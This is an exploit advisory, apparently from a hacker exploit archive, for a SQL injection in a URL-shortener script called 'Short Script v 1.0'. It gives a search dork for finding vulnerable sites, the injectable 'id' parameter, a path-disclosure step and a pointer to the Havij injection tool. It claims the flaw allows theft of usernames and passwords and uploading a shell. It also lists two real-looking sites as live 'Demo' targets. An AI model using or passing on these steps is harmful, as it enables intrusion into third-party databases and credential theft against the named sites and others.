facebook facebook twitter rss

url shortener SQL Injection Vulnerability

Author: Sd-cracker , Published: 04-02-2013
-------------------------------------------------------------------
url shortener SQL Injection Vulnerability
-------------------------------------------------------------------
# Vendor: Unknown
# Security Risk : High - SQL Injection
# version : Short Script v 1.0 & every shorten script that looks like the one in the pic
# pic of the script : [http://img827.imageshack.us/img827/9343/74711944.jpg]
#####
# Author => Sd-cracker
# E-mail => sd-cracker[at]hotmail[dot]com
# Facebook => http://fb.me/sdcracker.hack
# Google Dork => 1# intext:"Short Script v 1.0"
# 2# your a hacker for god sake
# Tested on : Windows 7 , Backtrack 5r2
####

#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password .......

# also in some conditions [Magic Quotes ON]
can upload a shell via sql injection .......
------------------

#=> Exploit :
------------------
1#=> Full Path Disclosure :

http://[target]/[path]/m1.php?id=945

http://[target]/[path]/admin
-------
2#=> SQL Injection

[Inject with Havij or inject manually]

http://[target]/[path]/m1.php?id=945'[inj3ct h3re]
----
#Demo :
http://www.egcenter.com/m1.php?id=1033

http://short.109acu.info/m1.php?id=395536

--
#Greetz to: All Arab Hackers

------------------------------ <= Th3 End ^_^'

Like us on Facebook :